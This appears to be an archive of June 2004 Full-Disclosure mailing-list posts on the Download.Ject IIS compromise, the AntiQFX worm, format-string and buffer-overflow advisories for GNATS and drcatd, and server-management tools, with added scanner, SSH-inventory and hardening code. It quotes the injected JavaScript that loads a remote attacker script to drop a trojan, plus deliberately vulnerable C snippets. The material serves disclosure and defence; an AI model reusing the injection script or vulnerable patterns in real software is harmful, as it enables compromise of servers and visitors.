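    (root / "notes.txt").write_bytes(b"Plain text file.\r\n" + INJECTED_TAIL)
    (root / "img" / "logo.gif").write_bytes(b"GIF89a" + bytes(40) + INJECTED_TAIL)


def demo_scan() -> Dict[str, List[str]]:
    """Build the fixture in a temporary directory and scan it."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    build_sample_webroot(root)
    return scan_tree(root)


if __name__ == "__main__":
    for path, reasons in demo_scan().items():
        print(f"{path}: {'; '.join(reasons)}")
```

Point `scan_tree()` at a copy of the web root taken from the server, not the live tree: the server is compromised, so the copy should be made from a trusted host and the findings should feed a rebuild plus MS04-011, not a cleanup in place. The bare-IP heuristic will also flag legitimate content that links to addresses rather than names, so treat it as a triage aid.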


 
Re: [Full-Disclosure] server administration

From: Mohit Muthanna (mohit.muthannagmail.com)
Date: Fri Jun 25 2004 - 09:40:01 CDT


Harry,

What you're talking about falls under the realm of Systems / Network
Management. Generally when you have large numbers of servers / devices
to manage you need an effective tool. You can write your own scripts,
but you'd just be duplicating the efforts of a number of available
tools out there.

I'd suggest you read up on SNMP. And check out the following tools
(google them):

- net-snmp ( an SNMP agent )
- nagios ( very sophisticated network management tool )
- nmap ( good discovery tool )
- ntop ( traffic analysis, RMON agent, performance monitoring )
- sar ( system performance monitoring )
- argus (network performance monitoring)
- rsync (distributed configurations, files etc.)
- openssh (if you don't know what this is, you're in trouble)
- rcs, cvs or subversion (change control)

There are also a number of commercial tools available, but the above
list encompasses most of what you will need.

Hope this helps,
Mohit.

--
Mohit Muthanna, CISSP
mohit (at) muthanna (uhuh) com
"There are 10 types of people. Those who understand binary, and those
who don't."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
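For the collection half of Harry's question (the post misiu quotes above, and the openssh entry on Mohit's list), here is an added example, not code from either poster, of what a minimal central collector looks like when least privilege is designed in from the start: a key used for nothing but inventory, host keys pinned in a centrally maintained known_hosts so a reinstalled or impersonated server is refused, BatchMode so an unattended run fails instead of hanging on a prompt, and a forced command on every managed server so the key can only answer a fixed list of read-only probes, never open a shell. The paths, the `inventory` user, the address 10.0.0.5, the script name /usr/local/sbin/inventory-report and the canned host data are assumptions for the example. Snapshots are JSON, so two runs can be diffed for drift, which covers the "dynamic info" part.

```python
import json
import subprocess
import time
from typing import Callable, Dict, Iterable

# Assumptions for this example (not from the thread): a key used for nothing
# but inventory, and a known_hosts file maintained on the central server so a
# host whose key changed is refused rather than silently re-trusted.
INVENTORY_KEY = "/etc/inventory/id_ed25519"
KNOWN_HOSTS = "/etc/inventory/known_hosts"

# Server side: ~inventory/.ssh/authorized_keys on every managed host. The
# forced command means this key can never yield a shell; from= pins the
# central server (assumed 10.0.0.5). The client's request arrives in
# SSH_ORIGINAL_COMMAND and is matched against an allowlist of probe names.
AUTHORIZED_KEYS_LINE = (
    'command="/usr/local/sbin/inventory-report",from="10.0.0.5",'
    'no-port-forwarding,no-agent-forwarding,no-X11-forwarding,no-pty '
    'ssh-ed25519 AAAA...public-key... inventory@central'
)

# /usr/local/sbin/inventory-report (hypothetical): one read-only probe per
# name. The client can pick a name, not supply a command.
INVENTORY_REPORT_SH = r"""#!/bin/sh
case "$SSH_ORIGINAL_COMMAND" in
  hostname)  hostname -f ;;
  kernel)    uname -sr ;;
  serial)    cat /sys/class/dmi/id/product_serial 2>/dev/null || echo unknown ;;
  uptime)    cut -d' ' -f1 /proc/uptime ;;
  listeners) ss -Hltn | awk '{print $4}' | sort ;;
  disk_root) df -P / | awk 'NR==2 {print $5}' ;;
  *) echo "refused: $SSH_ORIGINAL_COMMAND" >&2; exit 1 ;;
esac
"""

PROBES = ("hostname", "kernel", "serial", "uptime", "listeners", "disk_root")
VOLATILE = {"collected_at", "uptime"}          # expected to differ on every run

Runner = Callable[[str, str], str]              # (host, probe name) -> stdout


def ssh_runner(host: str, probe: str) -> str:
    """Ask `host` for one probe. BatchMode=yes makes an unattended run fail
    instead of hanging on a prompt; StrictHostKeyChecking=yes refuses unknown
    or changed host keys. argv is a list, so `host` is never shell-parsed."""
    argv = [
        "ssh", "-i", INVENTORY_KEY,
        "-o", "BatchMode=yes",
        "-o", "StrictHostKeyChecking=yes",
        "-o", f"UserKnownHostsFile={KNOWN_HOSTS}",
        "-o", "ConnectTimeout=10",
        "-l", "inventory", host, probe,
    ]
    done = subprocess.run(argv, capture_output=True, text=True, timeout=60)
    if done.returncode != 0:
        raise RuntimeError(f"{host}: ssh exit {done.returncode}: {done.stderr.strip()}")
    return done.stdout


def collect(hosts: Iterable[str], runner: Runner = ssh_runner) -> Dict[str, dict]:
    """Gather every probe from every host. A failing host is recorded with
    its error so the run completes and the gap is visible in the snapshot."""
    snapshot = {}
    for host in hosts:
        facts = {"collected_at": int(time.time())}
        try:
            for probe in PROBES:
                facts[probe] = runner(host, probe).strip()
        except Exception as exc:                # timeout, refused key, host down
            facts["error"] = str(exc)
        snapshot[host] = facts
    return snapshot


def diff_snapshots(old: Dict[str, dict], new: Dict[str, dict]) -> Dict[str, dict]:
    """Facts that changed between two runs: a new listening port, a new
    kernel, a host that vanished. Volatile facts are ignored."""
    changes = {}
    for host in sorted(set(old) | set(new)):
        before, after = old.get(host, {}), new.get(host, {})
        delta = {
            k: (before.get(k), after.get(k))
            for k in sorted(set(before) | set(after))
            if k not in VOLATILE and before.get(k) != after.get(k)
        }
        if delta:
            changes[host] = delta
    return changes


if __name__ == "__main__":
    import sys
    # Hosts on the command line; the snapshot goes to stdout for the store.
    print(json.dumps(collect(sys.argv[1:]), indent=2, sort_keys=True))
```

Run it from cron on the central server, keep each snapshot, and alert on `diff_snapshots()` output: a new entry under `listeners` is exactly the kind of change an inventory should surface. The push half of the question (configs and restarts) should not reuse this key; give it a second key with its own forced command that accepts only what that job needs, rather than a shell, so that a compromise of the central box is bounded to what each key is allowed to do.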


 
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

bills.bitchhushmail.com
Date: Fri Jun 25 2004 - 10:01:33 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This is impossible. Microsoft products are inherently secure. We have
a patched IIS as stated by the alert, an alpha security patch for the
operating system and open holes in the browser. No doubt this is a vicious
anti-Microsoft attempt to discredit their security commitments by people
who are jealous of Bill Gates' wealth. That or maybe by disgruntled individuals
who failed to earn their MVP status.

> For the IIS side....
>
> http://www.microsoft.com/security/incident/download_ject.mspx
>
>
>
> Microsoft teams are investigating a report of a security issue affecting
> customers using Microsoft Internet Information Services 5.0 (IIS) and
> Microsoft Internet Explorer, components of Windows.
>
> Important Customers who have deployed Windows XP Service Pack 2 RC2 are not
> at risk.
>
> Reports indicate that Web servers running Windows 2000 Server and IIS that
> have not applied update 835732, which was addressed by Microsoft Security
> Bulletin MS04-011, are possibly being compromised and being used to attempt
> to infect users of Internet Explorer with malicious code.
>
>
>
>
>
>
> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Peter Kruse
> Sent: Thursday, June 24, 2004 7:22 PM
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] New malware to infect IIS and from there jump to
> clients
>
> Hi all,
>
> This is a heads up.
>
> A new malware has been reported from several sources so it appears to be
> fairly widespread already.
>
> The malware spreads from infected IIS servers to clients that visit the
> webpage of the infected server. How the IIS servers were compromised in the
> first place is unfortunately still unknown (any info on that would be
> appreciated).
>
> The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
> so by running a javascript that apparently gets appended to several files in
> the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
> 217.107.218.147/xxx.html that contains the following code:
>
> <script language="Javascript">
>
> function InjectedDuringRedirection(){
> showModalDialog('md.htm', window, "dialog
> Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
> :1\;").location= " java script:'<SCRIPT SRC =\\' http://
> 217.107.218.147/shellxxx.js\\'> <\ /script>'";
>
> [snip - you get the picture, right?]
>
> I had to put in some spaces to get past trivial content filtering.
>
> From that point it will try to run the malware in a 1x1 dialogbox in the
> following order:
>
> shellscript_loadxxx.js
> shellxxx.js
>
> The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a
> trojan-downloader and run it.
>
> Consider denying access to http://217.107.218.147 in your firewall. This
> will at least prevent client PCs from getting infected.
>
> Further information can be found in the daily log from SANS:
> http://isc.sans.org/
>
> Regards
> Peter Kruse
> http://www.csis.dk
>
>
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDcPmgACgkQ9hJzGKhH2Ld2CgCguxLYUab6EyIAef5qK5YVBK3JDX0A
n1iDB7VSzmP2NVQyeldO+9agWW8q
=Uc5R
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

dinisddplus.net
Date: Fri Jun 25 2004 - 09:50:35 CDT


With the current (in)security of most (if not all) ISPs
that provide ASP.Net or ASP Classic shared hosting
services, all the attackers need to do is to get a
hosting account in a shared hosting server (trivial)
and infect these websites from the inside.

I haven't heard of any new IIS exploit (which doesn't
mean that they don't exist), but compromising the IIS
box from the inside (as seen by the Interland story) is
probably how this happened.

BTW, do you know which ISP hosts the 'compromised'
websites?

Dinis Cruz
.Net Security Consultant
DDPlus

On Fri, 25 Jun 2004 09:20:34 -0400, Gary Flynn wrote

>
> Just a reminder. This isn't the first time this has
> happened:
>
> http://www.computerworld.com/securitytopics/security/story/0,10801,84675,00.html?SKC=home84675
>
> --
> Gary Flynn
> Security Engineer
> James Madison University
>



 
Re: [Full-Disclosure] server administration

From: Mohit Muthanna (mohit.muthannagmail.com)
Date: Fri Jun 25 2004 - 09:58:19 CDT


> Having said that, you're going to be disappointed in what snmp will
> provide unless you want to start writing MIBs (you don't). So you will
> be doing some sort of client/server model maybe with *NIX tools like
> vmstat and traceroute and wget. We did something similar in 1998 I
> recall.

I wouldn't discount SNMP so easily. A good SNMP agent will provide a
lot of useful information related to the system. Eg. see net-snmp
(opensource) or sysedge (Commercial).

You don't _ever_ have to write a MIB unless you're developing an SNMP
agent/layer for a custom application.

I've worked in environments (ISPs and Telcos) where we've had to
manage servers with numbers in the thousands. And generally the first
question we ask when a new device comes in is: "Is it SNMP enabled?"

Standard UNIX tools vmstat, traceroute, etc. are cool when you're
trying to debug a problem on a machine. Or when you have only a few
machines to maintain. But as soon as you hit about 30 - 40 machines,
you're going to have problems.

SNMP (v1 and v2c) does, OTOH, have security drawbacks since the
packets are pretty much "in the air". But with good host and network
security, you can work around them. SNMPv3 addresses most of the
security issues with the earlier versions.

Mohit.

--
Mohit Muthanna [mohit (at) muthanna (uhuh) com]
"There are 10 types of people. Those who understand binary, and those
who don't."



 
Re: [Full-Disclosure] defamatory joe job attack by botnet

From: Jean-Marie Monnier (kedvesattglobal.net)
Date: Tue May 25 2004 - 10:44:41 CDT


I can only second Charles' and Isi's statements.... I sent a mail
earlier this morning to the list, and it was bounced back to me by
different engines. I made my case worse by underlining the fact that
the body of the messages sent under my sp**fed identity were either
advertising P*RN sites, or were plain SP*M for any kind of products..
the full and correct spelling of P*RN and SP*M triggered also some
sites to reject straight away my message ;-). Life is not easy, and it
seems we ain't seen anything yet... oh well...:-)
 
Jean-Marie Monnier

Charles Richmond wrote:

>
> On Jun 24, 2004, at 11:43 PM, lsi wrote:
>
>> I can report that not only is this activity continuing, but it is
>> doing so under the names of ... well, me, at least - I have received
>> several bounces indicating that my email address is being used as the
>> "from" address.
>
>
> The spammers are using addresses from bugtraq submissions
> and other security lists also. Clearly it is to their advantage to
> harass those of us who are at all active on the security and
> anti-spam side. It took Verizon months to stop blocking based
> on spoofed addresses and Barry Shein's "Software Tool & Die"
> (std.com) is still blocking based on spoofed addresses.
>
> It behooves all of us to do our best to block actual spammers
> and not their spoofed victims.
>
> Charles Richmond
>
> Implemented Integrated Systems Corporation http://www.iisc.com
> O/S, I18N, Systems Development, Process and Integration Providers
> cmriisc.com cmracm.org YIM:cmriisc http://www.iisc.com/cmr
> 7B West St., Somerville, Ma. USA 02144 (781) 389 9777
>
>



 
Re: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

From: Nick FitzGerald (nickvirus-l.demon.co.uk)
Date: Fri Jun 25 2004 - 10:58:28 CDT


X iniT <x1n1tyahoo.com> wrote:

<<snip>>
> Look closely and you'll see that i've attached this
> file using my yahoo account. Which happens to be
> protected by NAV !!!
>
> The following link clearly states that NAV detects
> this worm since 2002 !!!
> http://securityresponse.symantec.com/avcenter/venc/data/w32.antiqfx.f.worm.html
>
> Same thing is with AVP, ClamV & F-Prot.
>
> Only Sophos detects this file as AntiQFX.F variant.

That's odd -- I had the file scanned with 22 different virus scanners
and only three (NAV, Panda and ClamAV) missed detecting it as "AntiQFX"
or something very similar...

Regards,

Nick FitzGerald



 
Re: [Full-Disclosure] server administration

From: Darren Spruell (darren_spruellsento.com)
Date: Fri Jun 25 2004 - 11:48:32 CDT


Mohit Muthanna wrote:

> I'd suggest you read up on SNMP. And check out the following tools
> (google them):
>
> - net-snmp ( an SNMP agent )
> - nagios ( very sophisticated network management tool )
> - nmap ( good discovery tool )
> - ntop ( traffic analysis, RMON agent, performance monitoring )
> - sar ( system performance monitoring )
> - argus (network performance monitoring)
> - rsync (distributed configurations, files etc.)
> - openssh (if you don't know what this is, you're in trouble)
> - rcs, cvs or subversion (change control)
>
> There are also a number of commercial tools available, but the above
> list encompasses most of what you will need.

I have to throw cfengine into this mix, too.

http://www.cfengine.com/

Free and perfect for management/deployment to large numbers of
Windows/Unix boxen.

--
DS



 
Re: [Full-Disclosure] server administration

From: Mohit Muthanna (mohit.muthannagmail.com)
Date: Fri Jun 25 2004 - 12:00:53 CDT


> I have to throw cfengine into this mix, too.
>
> http://www.cfengine.com/
>

Of course... how could I forget cfengine. Another godsend.

Also just remembered: syslog-ng is a good replacement for syslog.

Thx,
Mohit.

--
Mohit Muthanna [mohit (at) muthanna (uhuh) com]
"There are 10 types of people. Those who understand binary, and those
who don't."



 
RE: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

From: Randal, Phil (prandalherefordshire.gov.uk)
Date: Fri Jun 25 2004 - 11:51:07 CDT


Nick FitzGerald [nickvirus-l.demon.co.uk] wrote:

> That's odd -- I had the file scanned with 22 different virus
> scanners and only three (NAV, Panda and ClamAV) missed detecting it
> as "AntiQFX" or something very similar...

New patterns for ClamAV have just been released (daily.cvd version 371)
which detect it.

Cheers,

Phil
----
Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK



 
Re: [Full-Disclosure] Evidence of a ISC being hacked?

Valdis.Kletnieksvt.edu
Date: Fri Jun 25 2004 - 12:03:49 CDT


On Thu, 24 Jun 2004 21:12:46 PDT, VX Dude <vxdude2003yahoo.com> said:

> "...and the build broke on OTHER systems
> because there wasn't a vsnprintf() in the vendor libc
> - and your boss is
> telling you TO GET THE THING TO BUILD, NOW....
>
> The programmer who is willing to swear on a Bible that
> they have *never* in
> their professional careers done something like this
> because they were in a
> time crunch is either a newbie or a complete liar."
>
> The word "boss" give me the illusion of some profit
> being made. Once again I could just be paranoid.

Remember that the majority of code in this world is *still* custom-written
applications code inside corporations. And I was discussing the *GENERAL*
scenario of how such things happen.

If "boss" offends you, replace it with "open source project leader".

You want an example in the open source world, wander over to the Gaim project
on SourceForge, where within the last 48 hours or so, the Yahoo people changed
their protocol again, leaving all the Trillian and Gaim users unable to connect
to Yahoo. Awful lot of duplicate bug reports filed, and "me-too" followups to
bug reports, and so on.

That's the sort of time when corners get cut, code auditing may not be quite as
stringent, and so on. In fact, the *last* time that Yahoo changed the
protocol, the resulting patch flurry ended up with a buffer overflow in Gaim
and Trillian (found by Stefan Messier, if I remember right), and the lack of
proper paperwork resulted in some GPL questions against Trillian....

(I'm only picking on the Gaim project because I'm aware of it, partly because
my fix for an earlier Gaim bug ended up dragged into the Gaim/Trillian GPL
mess... All you fans of other open-source projects, quit smirking - someday
*you*'ll be in that same position - I guarantee it, based on a quarter-century
of observing this industry... ;)

> Apparently the idea of people patching open source
> products just shows how much of a newbs we are.

See above... just because it's open source doesn't mean it doesn't have those
same problems.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFA3Fr1cC3lWbTT17ARAlATAJ9DSuSLfe3A74/jrIu/cHBFY6y1vgCgicKD
AVX/1jYx4yQVr82HT2X7NcY=
=d8Jz
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

From: Raymond Dijkxhoorn (raymondprolocation.net)
Date: Fri Jun 25 2004 - 11:59:50 CDT


Hi!

> > Same thing is with AVP, ClamV & F-Prot.
> > Only Sophos detects this file as AntiQFX.F variant.

> That's odd -- I had the file scanned with 22 different virus scanners
> and only three (NAV, Panda and ClamAV) missed detecting it as "AntiQFX"
> or something very similar...

Bitdefender detects it also, and so does ClamAV right now, in the last
virus signature update its included.

Bye,
Raymond.



 
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

From: insecure (insecureameritech.net)
Date: Fri Jun 25 2004 - 12:36:41 CDT


Berbew/Webber/Padodor Trojan, according to Lurhq.

http://www.lurhq.com/berbew.html

joe wrote:

>For the IIS side....
>
>http://www.microsoft.com/security/incident/download_ject.mspx
>
>
>
>Microsoft teams are investigating a report of a security issue affecting
>customers using Microsoft Internet Information Services 5.0 (IIS) and
>Microsoft Internet Explorer, components of Windows.
>
>Important Customers who have deployed Windows XP Service Pack 2 RC2 are not
>at risk.
>
>Reports indicate that Web servers running Windows 2000 Server and IIS that
>have not applied update 835732, which was addressed by Microsoft Security
>Bulletin MS04-011, are possibly being compromised and being used to attempt
>to infect users of Internet Explorer with malicious code.
>
>
>
>
>
>
>-----Original Message-----
>From: full-disclosure-adminlists.netsys.com
>[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Peter Kruse
>Sent: Thursday, June 24, 2004 7:22 PM
>To: full-disclosurelists.netsys.com
>Subject: [Full-Disclosure] New malware to infect IIS and from there jump to
>clients
>
>Hi all,
>
>This is a heads up.
>
>A new malware has been reported from several sources so it appears to be
>fairly widespread already.
>
>The malware spreads from infected IIS servers to clients that visit the
>webpage of the infected server. How the IIS servers was compromised in the
>first place is unfortunately still unknown (any info on that would be
>appreciated).
>
>The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
>so by running a javascript that apparently gets appended to several files in
>the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
>217.107.218.147/xxx.html that contains the following code:
>
><script language="Javascript">
>
> function InjectedDuringRedirection(){
> showModalDialog('md.htm', window, "dialog
>Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
>:1\;").location= " java script:'<SCRIPT SRC =\\' http://
>217.107.218.147/shellxxx.js\\'> <\ /script>'";
>
>[snip - you get the picture, right?]
>
>I had to put in some spaces to get past trivial content filtering.
>
>From that point it will try to run the malware in a 1x1 dialogbox in the
>following order:
>
>shellscript_loadxxx.js
>shellxxx.js
>
>The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a
>trojan-downloader and run it.
>
>Consider to deny access to http://217.107.218.147 in your firewall. This
>will at least prevent client PCs from getting infected.
>
>Further information can be found in the daily log from SANS:
>http://isc.sans.org/
>
>Regards
>Peter Kruse
>http://www.csis.dk
>
>
>
>



 
[Full-Disclosure] format string vulnerability in Gnats

From: Khan Shirani (khan_shiraniyahoo.com)
Date: Fri Jun 25 2004 - 12:42:54 CDT


Zone-h Security Advisory Date of discovery : 21 june 2004
Date of release : 24 june 2004 http://www.zone-h.org

Bug found by Khan Shirani
<shiranizone-h.org>

---------------------------------------
Software : GNU Gnats 4.00
Bugs : format string bug(s)
Risk : low/medium
Platform : *nix
---------------------------------------

Description:
============
GNU GNATS is a set of tools for tracking bugs reported by users to a central site.
It allows problem report management and communication with users via various means.
GNATS stores all the information about problem reports
in its databases and provides tools for querying, editing, and maintenance of the databases.
http://www.gnu.org/software/gnats/

Vulnerability:
==============
A format string bug has been discovered in the Gnats package which
could *possibly* be exploited to execute arbitrary commands.

vulnerable code:
================

----------------------
gnats-4.0\gnats\misc.c
#ifdef HAVE_SYSLOG_H
case SYSLOG:
syslog (severity, buf);
break;
#endif
----------------------

Vendor Notice:
==============
The Gnats team has been notified of the discoveries via <bug-gnatsgnu.org>
No patch is available at this time

Copyright
=========
Contents may not be altered without notification to original author
permission is granted to reproduce this advisory on public databases.

shiranizone-h.org
and all the zone-h team.
http://www.zone-h.org
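The pattern the advisory points at is the classic one: the log message is passed to syslog() as its format string, so any conversion directives inside attacker-controlled text are interpreted. The block below is an added illustration, not code from GNATS or from the advisory: it places the vulnerable shape beside the fixed shape (a constant "%s" format with the message as an argument), plus two small helpers of my own, count_directives() to audit how many directives a given message would trigger and render_fixed() to show that with the constant format the data survives as literal text. The "login failed for %x%x%n" message is a constructed sample.

```c
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Vulnerable shape from the advisory: the message *is* the format string, so
 * "%x", "%s" or "%n" inside it are interpreted by syslog(). Kept only for
 * comparison; main() never calls it. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
static void log_vulnerable(int severity, const char *buf)
{
    syslog(severity, buf);
}
#pragma GCC diagnostic pop

/* Hardened form: a constant format, the message passed as a %s argument. */
static void log_fixed(int severity, const char *buf)
{
    syslog(severity, "%s", buf);
}

/* Count the conversion directives a string would trigger if it were used as a
 * format: every '%' that is not part of a "%%" escape. Useful when assessing
 * what an attacker-supplied message would do to the vulnerable call. */
static int count_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* "%%" is a literal percent sign */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

/* Format a message the safe way into a caller-supplied buffer. Returns the
 * number of bytes stored (excluding the NUL), truncated to fit. With the
 * constant "%s" format the directives in the data are copied, not executed. */
static size_t render_fixed(char *out, size_t n, const char *buf)
{
    int r = snprintf(out, n, "%s", buf);
    if (r < 0) {
        if (n) out[0] = '\0';
        return 0;
    }
    return (size_t)r < n ? (size_t)r : n - 1;
}

int main(void)
{
    /* Constructed attacker-style message: three directives that the vulnerable
     * call would interpret and that the fixed call logs as plain text. */
    const char *msg = "login failed for %x%x%n";
    char out[64];

    printf("directives in message: %d\n", count_directives(msg));
    render_fixed(out, sizeof out, msg);
    printf("rendered safely: %s\n", out);
    log_fixed(LOG_INFO, msg);   /* harmless: constant format */
    (void)log_vulnerable;       /* shown for comparison, deliberately not called */
    return 0;
}
```

The one-line fix (`syslog(severity, "%s", buf)`) is the whole remediation; count_directives() is only an audit aid for reviewing messages that reach a call like the original.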



 
[Full-Disclosure] Multiple remote & local buffer overflows discovered in Drcatd

From: Khan Shirani (khan_shiraniyahoo.com)
Date: Fri Jun 25 2004 - 12:39:31 CDT


Zone-h Security Advisory
Date of discovery : 24 june 2004
Date of release : 25 june 2004
Bug found by Khan Shirani
<shiranizone-h.org>
http://www.zone-h.org

---------------------------------------
Software : Drcatd
Bugs : Buffer Overflows , Remote and local (multiple)
Risk : low
Platform : *nix
---------------------------------------

Description:
========
Dr.Cat (Dave's Remote Cat) concatenates a file on a remote Linux host that is running the
Dr.Cat daemon (drcatd) to stdout in the client's terminal. It authenticates users versus
the standard shadow password authentication facility and spawns a process with that user's
permissions to attempt to access the requested file.
http://www.joltedweb.com/drcat/

Vulnerability:
=========
Multiple local buffer overflows have been discovered. In addition to this, remote exploitation
is also possible due to a lack of boundary checking of input once a user has been authenticated.
The vulnerability exists when the remote user sends an overly long filename that doesn't exist.
This is handled by an sprintf() call, which is where the overflow will occur.
vulnerable code:
===========
----------------------
drcat-0.5.0-beta\src\drcatd.c
sprintf(fdne_msg, "%s - File Does Not Exist", buf);
logIt(fdne_msg);
sprintf(fd_msg, "%s - File Does Not Exist\n", buf);
len = sizeof(fd_msg);
local_send(new_fd, fd_msg, len);
exit(1);
----------------------
NOTE: Due to the exit(1) from the above snippet, exploitation of this vulnerability is not possible on x86 architectures.

Vendor Notice:
==========
The vendor has been notified via <davejoltedweb.com>
Copyright
=======

Contents may not be altered without notification to original author
permission is granted to reproduce this advisory on public databases.
shiranizone-h.org
and all the zone-h staff.
http://www.zone-h.org
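The quoted snippet has two separate defects: sprintf() into a fixed buffer with an attacker-chosen filename (the overflow the advisory reports), and `len = sizeof(fd_msg)` handing the buffer size rather than the message length to local_send(), which ships whatever stale bytes follow the message to the client. The block below is an added example written for this thread, not drcatd's own code: build_fdne_reply() is a bounded replacement that returns the length actually produced, and the two helpers quantify what the original would do for a given name. MSG_MAX is a hypothetical buffer size (the advisory does not give drcatd's), and the filenames are constructed inputs.

```c
#include <stdio.h>
#include <string.h>

#define MSG_MAX 256   /* hypothetical size for fd_msg; the advisory does not state drcatd's */

static const char SUFFIX[] = " - File Does Not Exist\n";

/* Hardened replacement for the sprintf()/sizeof() pair in the advisory:
 * bounded formatting, and a send length equal to the bytes actually produced.
 * Returns the number of bytes the caller should hand to local_send(). */
static size_t build_fdne_reply(char *fd_msg, size_t cap, const char *name)
{
    /* snprintf writes at most cap bytes including the NUL and reports how long
     * the untruncated message would have been. */
    int r = snprintf(fd_msg, cap, "%s%s", name, SUFFIX);
    if (r < 0) {
        if (cap) fd_msg[0] = '\0';
        return 0;
    }
    return (size_t)r < cap ? (size_t)r : cap - 1;   /* truncated: send only what was stored */
}

/* How many bytes the original sprintf() would write past a cap-byte buffer for
 * this name (0 means it fits). Quantifies the overflow the advisory describes. */
static size_t overrun_bytes(size_t cap, const char *name)
{
    size_t need = strlen(name) + sizeof SUFFIX;    /* sizeof counts the NUL */
    return need > cap ? need - cap : 0;
}

/* How many never-written trailing bytes the original's
 * "len = sizeof(fd_msg); local_send(new_fd, fd_msg, len)" sends to the client
 * when the message is shorter than the buffer: a small information leak that
 * exists even for names that do not overflow. */
static size_t stale_bytes_sent(size_t cap, const char *name)
{
    size_t written = strlen(name) + sizeof SUFFIX;
    return written >= cap ? 0 : cap - written;
}

int main(void)
{
    char fd_msg[MSG_MAX];
    const char *name = "notes.txt";                 /* constructed input */
    size_t len = build_fdne_reply(fd_msg, sizeof fd_msg, name);

    printf("send %zu bytes: %s", len, fd_msg);
    printf("original would overrun by %zu and send %zu stale bytes\n",
           overrun_bytes(sizeof fd_msg, name), stale_bytes_sent(sizeof fd_msg, name));
    return 0;
}
```

Using the snprintf() return value (clamped to the buffer) as the send length fixes both problems at once; the same change applies to the `fdne_msg` line that feeds logIt().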



 
Re: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

From: Eric Paynter (ericarcticbears.com)
Date: Fri Jun 25 2004 - 12:20:28 CDT


On Fri, June 25, 2004 8:58 am, Nick FitzGerald said:
> That's odd -- I had the file scanned with 22 different virus scanners
> and only three (NAV, Panda and ClamAV) missed detecting it as "AntiQFX"
> or something very similar...

ClamAV is now detecting it as well. They must have updated their sigs
within the last hour.

$ clamscan MSCDEX.zip
MSCDEX.zip: Worm.AntiQFX.A FOUND

-Eric

--
arctic bears - affordable email and name services yourdomain.com
http://www.arcticbears.com



 
[Full-Disclosure] Fwd: Alert: IIS compromised to place footer JavaScript on each page

From: B3r3n (B3r3nargosnet.com)
Date: Fri Jun 25 2004 - 12:50:08 CDT


FYI

>There have been several reports of IIS servers being compromised in a
>similar fashion. The result is that each has a document footer specified
>which is JavaScript which causes the viewing browser to load a page from
>a malicious website. The loaded page installs a trojan via one of
>several attack methods attempted. According to Computer Associates, at
>least one of those methods remains unpatched. The malicious web page the
>client was being sent is no longer available.
>
>At this point it does not look like this is a widespread issue, but I'd
>like to see what you have seen.
>
>1. There is so far no reasonable explanation as to how the IIS servers
>are being compromised. The JavaScript which loads the attacking page
>checks first to see if the browser is viewing via HTTPS, and if so, then
>checks to see if there is a cookie on the client machine which starts
>with "trk716". If there isn't such a cookie, then the JavaScript
>executes causing the malicious page to be delivered to the victim. The
>cookie expires in 10 minutes.
>
>- Check your IIS Servers and verify whether the "Enable Document Footer"
>option has been enabled (inspect the Documents tab in IIS Manager for
>each site, or inspect the metabase for the EnableDocFooter is set to
>true.
>
>- If Document Footers are enabled and they shouldn't be, check which
>files are being specified as the footer document. If you have been
>attacked you will find files named similar to "iis7#.dll" in the
>\inetsrv directory. There may be one for each of your virtual
>directories.
>
>- ftpcmd.txt, agent.exe, and ads.vbs have also been found on compromised
>machines. ftpcmd gets the agent.exe, which is subsequently executed
>resulting in the metabase being modified by executing the ads.vbs with
>appropriate parameters.
>
>Questions for those of you who have been compromised:
>
>a) Do you have an SSL certificate on any site on the compromised box?
>There has been some speculation that this may have something to do with
>the attack.
>
>b) Were all of the sites on the compromised machine modified to include
>a document footer? If not, is there anything unique about the ones that
>were modified?
>
>c) If you had more than one machine compromised, did you have any
>similarly exposed IIS servers that weren't compromised? There is
>speculation that the attack is specific to IIS 5.0.
>
>d) Had you applied MS04-011 but not yet had the machine rebooted? A
>couple of the reports from compromised machines indicated they had
>applied the patch but not yet rebooted the machine. Try to be sure
>whether the machine was rebooted before indicating it was "fully
>patched." Please provide the details of the compromised box, its OS
>version, SP level, patches applied, plus any other components which may
>have been installed (e.g. Cold Fusion, etc...)
>
>e) Can you send me a copy of the agent.exe, or whatever name it may be?
>If so, please rename the extension to .ts and send it to
>Russ.CooperTruSecure.ca
>
>f) What directory did you find the ftpcmd.txt and/or agent.exe in?
>
>g) Check your logs for anything dated similar to the datetime of
>ftpcmd.txt, let me know if you find anything suspicious.
>
>2. The attack against the clients has been specified as being;
>
>Microsoft - Download.Ject
>http://www.microsoft.com/security/incident/download_ject.mspx
>Symantec - JS.Scob.Trojan
